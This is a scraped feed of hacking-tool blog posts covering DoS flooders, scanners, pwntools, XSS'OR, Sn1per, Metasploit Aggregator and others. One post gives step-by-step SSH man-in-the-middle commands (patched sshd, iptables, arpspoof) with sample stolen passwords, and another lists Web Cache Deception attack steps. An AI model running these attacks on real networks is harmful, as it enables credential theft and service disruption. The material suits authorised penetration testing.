Quantcast
Channel: Hacking Tools – DigitalMunition
Viewing all 236 articles
Browse latest View live

WarChild – Denial of Service Testing Suite

May 10, 2017, 9:26 pm
$
0
0
w
Warchild is a denial of service testing suite made for analysing the strength of your website against different kinds of denial of service attacks you will be facing which are mainly organised by crooks to cause damage to your website.

Installation

For Installing the required modules just run the following command in your terminal :)

                 pip install -r requirements.txt

Use

python warchild.py

Overview

This Denial Of Service suite comprises of the following features :
  1. CloudBust :- Cloudbust a.k.a AETHON is a cloudflare resolver that looks into the cloudflare protected website for misconfigured DNS configuration basically uses dnsdumpster.com as its resolver :)and identifies the backend IP of the website. We will add more updates in upcoming time.
  2. HTTP Flood :- HTTP Flood is a type of Denial of Service attack in which the attacker manipulates HTTP and POST unwanted requests in order to attack a web server or application. In an HTTP flood, the HTTP clients such as web browser interact with an application
    or server to send HTTP requests. The aim of the attack is when to compel the server to allocate as many resources as possible to serving the attack thus denying legitimate users access to the server’s resources. ALISA is a http d.o.s tool written in such a way to suck all of the website’s resources and is a layer 7 D.O.S tool.
  3. TCP SYN Flood :- A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target’s system in
    an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
  4. UDP Flood :- A UDP flood attack is a denial-of-service (DoS) attack using the User Datagram Protocol (UDP), a sessionless/connectionless computer networking protocol.

▼Advertisements

Author
Souhardya Sardar is an independent security analyst and programmer who loves to break things in order to secure them. Github :- github.com/Souhardya

The post WarChild – Denial of Service Testing Suite appeared first on DigitalMunition.

Search

scanless – Public Port Scan Scrapper

May 11, 2017, 9:28 pm
$
0
0
s
Command-line utility for using websites that can perform port scans on your behalf. Useful for early stages of a penetration test or if you’d like to run a port scan on a host and have it not come from your IP address.
scanless (adj): lacking respectable morals. That girl is scanless!

Public Port Scanners

Usage
Requires the requests and bs4 libraries to run, install with pip.

$ python scanless.py --help
usage: scanless.py [-h] [-t TARGET] [-s SCANNER] [-l] [-a]

scanless, public port scan scrapper

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        ip or domain to scan
  -s SCANNER, --scanner SCANNER
                        scanner to use (default: yougetsignal)
  -l, --list            list scanners
  -a, --all             use all the scanners

$ python scanless.py --list
Scanner Name   | Website
---------------|------------------------------
yougetsignal   | http://www.yougetsignal.com
viewdns        | http://viewdns.info
hackertarget   | https://hackertarget.com
ipfingerprints | http://www.ipfingerprints.com
pingeu         | http://ping.eu

$ python scanless.py -s viewdns -t scanme.nmap.org
Running scanless...

------- viewdns -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed smb
1433/tcp closed mssql
1521/tcp closed oracle
3306/tcp closed mysql
3389/tcp closed rdp
-----------------------

$ python scanless.py -a -t scanme.nmap.org
Running scanless...

------- yougetsignal -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
110/tcp  closed pop3
115/tcp  closed sftp
135/tcp  closed msrpc
139/tcp  closed netbios
143/tcp  closed imap
194/tcp  closed irc
443/tcp  closed https
445/tcp  closed smb
1433/tcp closed mssql
3306/tcp closed mysql
3389/tcp closed rdp
5632/tcp closed pcanywhere
5900/tcp closed vnc
6112/tcp closed wc3
----------------------------

------- viewdns -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed smb
1433/tcp closed mssql
1521/tcp closed oracle
3306/tcp closed mysql
3389/tcp closed rdp
-----------------------

------- hackertarget -------
tarting Nmap 7.01 ( https://nmap.org ) at 2017-05-06 02:31 UTC
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.065s latency).
Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
22/tcp   open   ssh           OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
23/tcp   closed telnet
25/tcp   closed smtp
80/tcp   open   http          Apache httpd 2.4.7 ((Ubuntu))
110/tcp  closed pop3
143/tcp  closed imap
443/tcp  closed https
445/tcp  closed microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.05 second
----------------------------

------- ipfingerprints -------
Host is up (0.16s latency).
Not shown: 484 closed ports
PORT    STATE    SERVICE
22/tcp  open     ssh
80/tcp  open     http
111/tcp filtered rpcbind
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Network Distance: 10 hops
------------------------------

▼Advertisements

------- pingeu -------
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
53/tcp   closed dns
80/tcp   open   http
139/tcp  closed netbios
443/tcp  closed https
445/tcp  closed smb
3389/tcp closed rdp
----------------------

 

The post scanless – Public Port Scan Scrapper appeared first on DigitalMunition.

Pwntools – CTF Framework And Exploit Development Library

May 14, 2017, 11:54 pm
$
0
0
p

pwntools is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and intended to make exploit writing as simple as possible.

from pwn import *
context(arch = 'i386', os = 'linux')

r = remote('exploitme.example.com', 31337)
# EXPLOIT CODE GOES HERE
r.send(asm(shellcraft.sh()))
r.interactive()

Documentation
Our documentation is available at docs.pwntools.com
To get you started, we’ve provided some example solutions for past CTF challenges in our write-ups repository.

Installation
pwntools is best supported on 64-bit Ubuntu 12.04 and 14.04, but most functionality should work on any Posix-like distribution (Debian, Arch, FreeBSD, OSX, etc.). Python 2.7 is required.
Most of the functionality of pwntools is self-contained and Python-only. You should be able to get running quickly with

▼Advertisements

apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
pip install --upgrade pip
pip install --upgrade pwntools

However, some of the features (assembling/disassembling foreign architectures) require non-Python dependencies. For more information, see the complete installation instructions here.

The post Pwntools – CTF Framework And Exploit Development Library appeared first on DigitalMunition.

Static Code Analyzer: PVS-Studio

May 16, 2017, 9:03 pm
$
0
0
s

PVS-Studio performs static code analysis and generates a report that helps a programmer find and fix bugs. PVS-Studio performs a wide range of code checks, it is also useful to search for misprints and Copy-Paste errors. Examples of such errors: V501, V517, V522, V523, V3001.

The main value of static analysis is in its regular use, so that errors are identified and fixed at the earliest stages. There is no point in wasting 50 hours looking for a bug that could be found with static analysis. So, let’s point out that again – the main idea of static analysis is not to find one hidden bug on the day before the release, but to fix dozens of bugs day by day.

The analyzer can be run at night on the server and warn about suspicious code fragments. Ideally, these errors can be detected and fixed before getting into the repository. PVS-Studio can automatically be launched immediately after the compiler for the files that have been just modified. It works in Windows and Linux.

 

Quick start in Windows and Linux

PVS-Studio can integrate into Visual Studio development environment 2010-2017. If you use this IDE, then most likely you will just have to go to the menu of PVS-Studio plugin and choose “Check Current Project”.

Often, it can be a more complicated process, and you will need to integrate PVS-Studio into a build system, even an exotic one. The topic of integration is too broad to describe it here. You can find all the information in the detailed documentation.

One more point to notice – PVS-Studio for Windows and Linux has special utilities, gathering information about the compiler launches. These tools allow doing a quick analysis of a project that gets compiled in any possible way. You can quickly try out the analyzer abilities, without wasting time on its integration with makefile or a build script. See the description of the utility Standalone (Windows) and pvs-studio-analyzer (Linux).

 

The technology of analysis

  • The pattern-based analysis on the basis of an abstract syntax tree is used to look for fragments in the source code that are similar to the known code patterns with an error.
  • The type inference based on the semantic model of the program allows the analyzer to have full information about all variables and statements in the code.
  • The symbolic execution allows evaluating values of variables that can lead to errors, perform range checking of values.
  • The data-flow analysis is used to evaluate limitations that are imposed on values of variables when processing various language constructs. For example, values that a variable can take inside if/else blocks.
  • Method annotations provide more information about the used methods than can be obtained by analyzing only their signatures.

▼Advertisements

Main features of PVS-Studio

  • Simple and seamless integration with Visual Studio 2010-2017
  • Automatic analysis of individual files after their recompilation
  • Online reference guide concerning all the diagnostics available in the program, on the web site and documentation (presented as a .pdf file) Up to 400 pages of documentation
  • Saving and loading analysis results allow doing overnight checks – during the night the analyzer does the scanning and provides you with the results in the morning.
  • Project analysis run from the command line: helps integrate PVS-Studio into overnight builds; a new log will be issued in the morning.
  • Great scalability Support of multi-core and multi-processor systems with the possibility to specify the number of the cores to use; IncrediBuild support.
  • Interactive filtering of the analysis results (the log file) in the PVS-Studio window: by the diagnostic number, file name, the keyword in the text of the diagnostic.
  • Automatic check of PVS-Studio updates (during the work in IDE and overnight builds).
  • BlameNotifier utility. The tool allows you to send e-mail notifications to the developers about bugs that PVS-Studio found during a night run.
  • A large number of options for integration into projects developed under Linux.
  • Mark as False Alarm – ability to mark the code to suppress a certain diagnostic in a particular code fragment.
  • Mass Suppression – ability to suppress all old messages raised for the legacy code, so that the analyzer reports 0 warnings. You can always go back to the suppressed messages later. This feature allows you to seamlessly integrate PVS-Studio into your development process and focus on errors found in new code only.
  • Error statistics can be viewed in Excel. Ability to view the speed of error correction, amount of bugs found for a certain period of time and so on.
  • Relative paths in report files to view them on different machines.
  • CLMonitoring feature allows analyzing the projects that have no Visual Studio files (.sln/.vcxproj); in case the CLMonitoring functionality is not enough, there is a possibility to integrate PVS-Studio in a Makefile-based build system manually.
  • pvs-studio-analyzer – a utility similar to CLMonitoring, but working under Linux.
  • Possibility to exclude files from the analysis by name, folder or mask; to run the analysis on the files modified during the last N days.
  • Integration with SonarQube. It is an open source platform, designed for continuous analysis and measurement of code quality.

 

Supported languages and compilers

  • Windows. Visual Studio 2017 C, C++, C++/CLI, C++/CX (WinRT), C#
  • Windows. Visual Studio 2015 C, C++, C++/CLI, C++/CX (WinRT), C#
  • Windows. Visual Studio 2013 C, C++, C++/CLI, C++/CX (WinRT), C#
  • Windows. Visual Studio 2012 C, C++, C++/CLI, C++/CX (WinRT), C#
  • Windows. Visual Studio 2010 C, C++, C++/CLI, C#
  • Windows. MinGW C, C++
  • Windows/Linux. Clang C, C++
  • Linux. GCC C, C++

 

https://www.viva64.com/en/m/

https://www.viva64.com/en/pvs-studio-download/

The post Static Code Analyzer: PVS-Studio appeared first on DigitalMunition.

Github Dorks – Github Security Scanning Tool

May 16, 2017, 9:05 pm
$
0
0
s

Github search is quite a powerful and useful feature and can be used to search for sensitive data in repositories, this Github security scanning tool comes with a collection of Github dorks that can reveal sensitive personal and/or other proprietary organisational information such as private keys, credentials, authentication tokens and so on.

 

github-dork.py is a simple Python tool that can search through your repository or your organisation/user repositories. It’s not a perfect tool at the moment but provides a basic functionality to automate the search on your repositories against the dorks specified in the text file.

 

Installation

This tool uses github3.py to talk with the GitHub Search API.

Clone the repository and run:

Usage

Some example usages are listed below:

You can download Github Dorks here:

Or read more here.

The post Github Dorks – Github Security Scanning Tool appeared first on DigitalMunition.

SSH Man-In-The-Middle Penetration Testing Tool

May 17, 2017, 11:32 pm
$
0
0
u
A patch applied to the OpenSSH v7.5p1 source code causes it to act as a proxy between the victim and their intended SSH server; all plaintext passwords and sessions are logged to disk.

Of course, the victim’s SSH client will complain that the server’s key has changed. But because 99.99999% of the time this is caused by a legitimate action (OS re-install, configuration change, etc), many/most users will disregard the warning and continue on.

NOTE: Only run the modified sshd in a VM or container! Ad-hoc edits were made to the OpenSSH sources in critical regions, with no regard to their security implications. Its not hard to imagine these edits introduce serious vulnerabilities. Until the dependency on root privileges is removed, be sure to only run this code on throw-away VMs/containers.

To Do

This is the first release of this tool. While it is very useful as-is, there are nevertheless things to improve:

  • Support SFTP MITM’ing.
  • Add port forwarding support.
  • Remove dependency on root privileges.
  • Create wrapper script that detects when user is trying to use key authentication only, and de-spoof them automatically.

Initial Setup

1.) Install zlib and openssl headers:
sudo apt install zlib1g-dev libssl-dev

2.) Download OpenSSH v7.5p1 and verify its signature:
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/RELEASE_KEY.asc
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz
wget https://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.5p1.tar.gz.asc
gpg –import RELEASE_KEY.asc
gpg –verify openssh-7.5p1.tar.gz.asc openssh-7.5p1.tar.gz

3.) Unpack the tarball, patch the sources, and compile it:
tar xzf openssh-7.5p1.tar.gz
patch -p0 < openssh-7.5p1-mitm.patch
mv openssh-7.5p1 openssh-7.5p1-mitm; cd openssh-7.5p1-mitm; ./configure –with-sandbox=no && make -j 10

4.) Create keys and setup environment:
sudo ssh-keygen -t ed25519 -f /usr/local/etc/ssh_host_ed25519_key < /dev/null
sudo ssh-keygen -t rsa -b 4096 -f /usr/local/etc/ssh_host_rsa_key < /dev/null
sudo useradd -m sshd && sudo useradd -m bogus && sudo chmod 0700 ~sshd ~bogus
sudo mkdir /var/empty; sudo cp ssh ~bogus/

Running The Attack

1.) Run sshd:
cd /path/to/openssh-7.5p1-mitm
sudo $PWD/sshd -f $PWD/sshd_config


2.) Enable IP forwarding:
sudo bash -c “echo 1 > /proc/sys/net/ipv4/ip_forward”
sudo iptables -P FORWARD ACCEPT

3.) Allow connections to sshd and re-route forwarded SSH connections:
sudo iptables -A INPUT -p tcp –dport 22 -j ACCEPT
sudo iptables -t nat -A PREROUTING -p tcp –dport 22 -j REDIRECT –to-ports 22

4.) ARP spoof a target(s) (Protip: do NOT spoof all the things! Your puny network interface won’t likely be able to handle an entire network’s traffic all at once. Only spoof a couple IPs at a time):
arpspoof -r -t 192.168.x.1 192.168.x.5

5.) Monitor auth.log. Intercepted passwords will appear here:
sudo tail -f /var/log/auth.log

6.) Once a session is established, a full log of all input & output can be found in /home/bogus/session_*.txt.

Sample Results

Upon success, /var/log/auth.log will have lines that log the password, like this:

▼Advertisements

May 16 23:14:01 showmeyourmoves sshd[16798]: INTERCEPTED PASSWORD: hostname: [10.199.30.x]; username: [jdog]; password: [supercalifragilistic] [preauth]

Furthermore, the victim’s entire SSH session can be found in/home/bogus/session_*.txt:

# cat /home/bogus/session_0.txt
Last login: Tue May 16 21:35:00 2017 from 10.50.22.x
OpenBSD 6.0-stable (GENERIC.MP) #12: Sat May  6 19:08:31 EDT 2017

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest version of the code.  With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

jdog@jefferson ~ $ ppss
PID TT  STAT       TIME COMMAND
59264 p0  Ss      0:00.02 -bash (bash)
52132 p0  R+p     0:00.00 ps
jdog@jefferson ~ $ iidd
uid=1000(jdog) gid=1000(jdog) groups=1000(jdog), 0(wheel)
jdog@jefferson ~ $ sssshh  jjtteessttaa@@mmaaggiiccbbooxx
jtesta@magicbox’s password: ROFLC0PTER!!1juan

Note that the characters in the user’s commands appear twice in the file because the input from the user is recorded, as well as the output from the shell (which echoes characters back). Observe that when programs like sudo and ssh temporarily disable echoing in order to read a password, duplicate characters are not logged.

Download SSH-MITM

The post SSH Man-In-The-Middle Penetration Testing Tool appeared first on DigitalMunition.

XSS’OR – Hack with JavaScript

May 19, 2017, 12:31 am
$
0
0
x

XSS’OR is a free online tool for hacking with JavaScript.

It contains three major modules:
1. Encode/Decode
The Encode/Decode module, including:

  • front-end encryption and decryption;
  • code compression, decompression, beautification, the implementation of testing;
  • character set conversion, hash generation;
  • and so on.

2. Codz

The Code module, including:
  • CSRF request code generation;
  • AJAX request code generation;
  • XSS attack Vector;
  • XSS attack Payload;
  • and so on.
3. Probe
The Probe module, in order to balance, it is the most basic probe, and each IP can generate a unique probe every day. You can use this probe to attack test (such as: XSS, phishing attacks, etc.). The probe can get the basic information of the target user, and you can dynamically inject more commands (JavaScript Codz) for “remote control” testing.
 

▼Advertisements

Some user experience and privacy considerations:
XSS’OR, even if your browser is accidentally closed or crashed, your records will not be lost, because the relevant records are cached to your browser local. The server will not store any of your privacy, except for the result record of the probe (only the result record) will be temporarily cached, because the design considerations, but these will be automatically cleared every day.

The post XSS’OR – Hack with JavaScript appeared first on DigitalMunition.

Recover files encrypted by the WannaCry ransomware: wanakiwi

May 20, 2017, 12:39 am
$
0
0
w

wanakiwi is based on wanadecrypt which makes possible for lucky users to :

  • Recover the private user key in memory to save it as 00000000.dky
  • Decrypt all of their files

The primes extraction method is based on Adrien Guinet’s [wannakey] (https://github.com/aguinet/wannakey) which consist of scanning the WannaCry process memory to recover the prime numbers that were not cleaned during CryptReleaseContext().

Usage

wanakiwi.exe [PID]

PID is an optional parameter, by default the utility will look for any of this process:

  • wnry.exe
  • wcry.exe
  • data_1.exe
  • ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

 

Limitations

Given the fact this method relies on scanning the address space of the process that generated those keys, this means that if this process had been killed by, for instance, a reboot – the original process memory will be lost. It is very important for users to NOT reboot their system before trying this tool.

Secondly, because of the same reason we do not know how long the prime numbers will be kept in the address space before being reused by the process. This is why it is important to try this utility ASAP.

This is not a perfect tool, but this has been so far the best solution for victims who had no backup.

▼Advertisements

Compatibility

O.S. x86 x64
Windows XP :white_check_mark: ?
Windows 2003 :white_check_mark: ?
Windows 7 :white_check_mark: ?

 

Frequently Asked Questions

Does it modify the original encrypted files ?

No, the original encrypted files (.WNCRY) remain unmodified. The decrypted files are generated as separate files.

 

https://github.com/gentilkiwi/wanakiwi

 

The post Recover files encrypted by the WannaCry ransomware: wanakiwi appeared first on DigitalMunition.

Search

Pybelt – The Hackers Tool Belt

May 21, 2017, 12:35 am
$
0
0
b

Pybelt is a Python-based hackers tool belt capable of cracking hashes without prior knowledge of the algorithm, scanning ports on a given host, searching for SQLi vulnerabilities in a given URL, verifying that your Google dorks work like they should, verifying the algorithm of a given hash, scanning a URL for XSS vulnerability, and finding usable HTTP proxies.

 

Features

Pybelt is an open source python hacking kit that comes with:

  • Port Scanner
  • SQL Injection scanner
  • Dork Checker
  • Hash Cracker
  • Hash Type Verification
  • Proxy Finder
  • XSS Scanner

▼Advertisements

 

Installation

Clone the repository:

Or download the latest release.

Once you have the program installed cd into the directory and run the following command:

This will install all of the programs needed libraries and should be able to be run from there.

You can download Pybelt here:

Pybelt-1,0.zip

Or read more here.

The post Pybelt – The Hackers Tool Belt appeared first on DigitalMunition.

Airachnid Burp Extension – A Burp Extension to test applications for vulnerability to the Web Cache Deception attack

May 21, 2017, 10:54 pm
$
0
0
b
A Burp extension to test applications for vulnerability to the Web Cache Deception attack.
Once the extension has been loaded, it can be accessed in the Target – Sitemap tab and right click on the resource that should be tested. A context sensitive menu item called “Airachnid Web Cache Test” will be shown and can be used to conduct testing. If the resource is vulnerable, an Issue is created detailing the vulnerability.
The context sensitive menu item is also available for requests in the Proxy – Http History tab.
Installation
  • Download the Airachnid.jar file.
  • In Burp Suite open Extender tab. In Extensions tab, click Add button.
  • Choose downloaded jar file -> Next.
  • Check installation for no error messages.
Vulnerability
In February 2017, security researcher Omer Gil unveiled a new attack vector dubbed “Web Cache Deception” (https://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html).
The Web Cache Deception attack could be devastating in consequences, but is very simple to execute:
  1. Attacker coerces victim to open a link on the valid application server containing the payload.
  2. Attacker opens newly cached page on the server using the same link, to see the exact same page as the victim.

** Of course, this attack only makes sense when the vulnerable resource available to the attacker returns sensitive data.
The attack depends on a very specific set of circumstances to make the application vulnerable: 1. The application only reads the first part of the URL to determine the resource to return.
If the victim requests:

https://www.example.com/my_profile

The application returns the victim profile page. The application uses only the first part of the URL to determine that the profile page should be returned. If the application receives a request for

https://www.example.com/my_profile_test

It would still return the profile page of the victim, disregarding the added text. The same applies for other URL like

https://www.example.com/my_profile/test

2. The application stack caches resources according to their file extensions, rather than by cache header values. If the application stack has been configured to cache image files. It will cache all resources with .jpg .png or .gif extensions. That means that e.g. the image at

https://www.example.com/images/dog.jpg

Would be retrieved from the application server the first time the image is requested. All subsequent requests for the image are retrieved from cache, responding with the same resource that was initially cached (for as long as the cache timeout is set).

▼Advertisements

Attack
These preconditions can be exploited for the Web Cache Deception attack in the following manner:

Step 1: An attacker entices the victim to open a maliciously crafted link:
https://www.example.com/my_profile/test.jpg

  • The application ignores the ‘test.jpg’ part of the URL, the victim profile page is loaded.
  • The caching mechanism identifies the resource as an image, caching it.

Step 2: The attacker sends a GET request for the cached page:
https://www.example.com/my_profile/test.jpg

  • The cached resource, which is in fact the victim profile page is returned to the attacker (and to anyone else requesting it).

 

The post Airachnid Burp Extension – A Burp Extension to test applications for vulnerability to the Web Cache Deception attack appeared first on DigitalMunition.

Meterpreter Session Proxy: Metasploit Aggregator

May 23, 2017, 12:15 am
$
0
0
m

The Metasploit Aggregator is a proxy for Meterpreter sessions. Normally, Meterpreter sessions connect directly to a Metasploit listener. However, this has a few problems:

  1. Multiple users cannot easily share the session once it is established, without some sort of external multiplexing scheme, such as running msfconsole in a screen session. While Metasploit Pro solves this issue to a certain extent, it is also limited by the number of users that can simultaneously interact with shared sessions.
  2. Running a full msfconsole on a remote listener is resource intensive because it uses multiple threads per connection. It has a hard time scaling reliably to thousands of sessions, and even fewer on Windows platforms.
  3. The design requires either running different copies of msfconsole, or putting all of your eggs in one basket. It is difficult to distribute sessions across many endpoints and have a global view of them all.

 

The Metasploit Aggregator solves these problems by implementing an event-driven listener that stands between msfconsole and Meterpreter. It can scale to thousands of connections, but only needs to make a single connection with Metasploit Framework to manage them all. Sessions can be shared between multiple users without any changes to the Meterpreter session Itself, such as by modifying the session transport configuration. The redirection of a session occurs behind the scenes on the control channel between Metasploit Aggregator and msfconsole.

Metasploit Aggregator introduces a few new concepts.

  • A ‘parked’ session is one that is terminated entirely by Metasploit Aggregator. This means that the minimal interaction with the session to simply keep it alive is handled by the aggregator automatically. A user can attach to a session at any time in order to interact with it.
  • A ‘cable’ is a listening port that the aggregator opens to accept new connections from Meterpreter. This is analogous to starting a handler on msfconsole.
  • The ‘default forward’ address is the location of a msfconsole instance that serves as a helper for Metasploit Aggregator. Metasploit Aggregator currently does not know how to handle staged sessions, request session details, or how to deal with AutoRun scripts. The default forward is where a session connecting to a cable is redirected on initial connection. The connection is enumerated for details of the target and continues to communicates with the default forward until requested specifically by another console or parked by request of the default forward.
  • A ‘forwarded’ session is one that terminates at the aggregator, but is then proxied to a msfconsole instance. The session is forwarded over a control channel connection to the aggregator. When you are done interacting with a session, it can be moved back to a ‘parked’ state for other users to use. Note: any user can steal a session if desired and forward it to a different msfconsole instance.

 

Installing

Standalone installation: gem install metasploit-aggregator.

To use Metasploit Aggregator, first start an instance of the aggregator itself. This is automatically packaged with Metasploit Framework, or can be installed standalone by running gem install metasploit-aggregator. The aggregator binary is called metasploit-aggregator, and listens on address 127.0.0.1, port 2447. Because the aggregator does not provide encryption or authentication by itself, to connect to a remote instance, we suggest using SSH port forwarding or some other tunneling technology to reach a remote aggregator.

On the system hosting the aggregator:

metasploit-framework$ metasploit-aggregator
2017-03-06 13:17:32 -0600 Starting administration service on 127.0.0.1:2447

On the client system:

ssh user@aggregator -L 127.0.0.1:2447:127.0.0.1:2447

Next, start a msfconsole instance and load the aggregator plugin. This will allow you to interact with the remote aggregator. This is also required to setup the default forward msfconsole instance. Setup the msfconsole instance to be the default forward. This instance will see all connections when they first arrive.

▼Advertisements

metasploit-framework$ ./msfconsole

  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+


       =[ metasploit v4.14.1-dev-5383900                  ]
+ -- --=[ 1627 exploits - 928 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > load aggregator
[*] Aggregator interaction has been enabled
[*] Successfully loaded plugin: aggregator
msf > aggregator_connect 127.0.0.1:2447
[*] Connecting to Aggregator instance at 127.0.0.1:2447...
msf >

 

https://github.com/rapid7/metasploit-aggregator

The post Meterpreter Session Proxy: Metasploit Aggregator appeared first on DigitalMunition.

Sn1per – Penetration Testing Automation Scanner

May 23, 2017, 12:18 am
$
0
0
s

 

Sn1per is a penetration testing automation scanner that can be used during a penetration test to enumerate and scan for vulnerabilities.

Features

  • Automatically collects basic recon (ie. whois, ping, DNS, etc.)
  • Automatically launches Google hacking queries against a target domain
  • Automatically enumerates open ports via NMap port scanning
  • Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
  • Automatically checks for sub-domain hijacking
  • Automatically runs targeted NMap scripts against open ports
  • Automatically runs targeted Metasploit scan and exploit modules
  • Automatically scans all web applications for common vulnerabilities
  • Automatically brute forces ALL open services
  • Automatically test for anonymous FTP access
  • Automatically runs WPScan, Arachni and Nikto for all web services
  • Automatically enumerates NFS shares
  • Automatically test for anonymous LDAP access
  • Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities
  • Automatically enumerate SNMP community strings, services and users
  • Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067
  • Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers
  • Automatically tests for open X11 servers
  • Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
  • Performs high level enumeration of multiple hosts and subnets
  • Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
  • Automatically gathers screenshots of all web sites
  • Create individual workspaces to store all scan output

▼Advertisements

Modes

  • REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append ‘report’ to any sniper mode or command.
  • STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking
  • DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
  • PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
  • FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
  • WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
  • NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.
  • AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP’s that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
  • NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
  • LOOT: Automatically organizes and displays loot folder in your browser and opens Metasploit Pro and Zenmap GUI with all port scan results. To run, type ‘sniper loot’.

There’s a sample report availabe here.

You can download Sn1per here:

Sn1per-v2.4.zip

Or read more here.

The post Sn1per – Penetration Testing Automation Scanner appeared first on DigitalMunition.

BoopSuite A Wireless Sniffer Tool

May 23, 2017, 9:36 pm
$
0
0
b
This project is easier to use, identifies clients more quickly than airodump-ng, and displays less useless information.

The developer said, “Don’t mistake me, aircrack is an amazing suite of tools and I understand the thought of “why use a different tool when airodump is still very usuable”, and the answer is because change is good, and this project is going to continue to grow as I add new handlers for additional packet types.”

Installation:

To install open a terminal and type:

git clone https://github.com/M1ND-B3ND3R/BoopSuite.git
cd BoopSuite
./setup.py

The setup includes creating two symbolic links for the gui and cli version of the tool so it can be run from anywhere.

Upgrade:

To upgrade open a terminal and type:

git clone https://github.com/M1ND-B3ND3R/BoopSuite.git

cd BoopSuite
./setup.py

▼Advertisements

How to Use?

To start sniffing:
boopsniff -i wlan1mon

To specify a channel:
boopsniff -i wlan1mon -c 6

Boop also works on the 5ghz spectrum if you have a supporting card:
boopsniff -i wlan1mon -f 5

Reporting can also be enabled:
boopsniff -i wlan1mon -r ~/report.txt

If some processes are interfering then you can preemptively kill them with:
boopsniff -i wlan1mon -k

If you want to see unassociated clients:
boopsniff -i wlan1mon -u

If you want to filter by a specific AP mac address:
boopsniff -i wlan1mon -a xx:xx:xx:xx:xx:xx

New Update includes a gui tool:
boopsniff_gui

Download Boopsuite

The post BoopSuite A Wireless Sniffer Tool appeared first on DigitalMunition.

Anti-DDoS Solution Based on iptables: nShield

May 25, 2017, 12:43 am
$
0
0
a

Requirements

  • Linux System with python, iptables
  • Nginx (Will be installed automatically by install.sh)

 

Quickstart

cd /home/ && git clone https://github.com/fnzv/nShield.git && bash nShield/install.sh

This script will replace all your iptables rules so take that into account

 

Usage

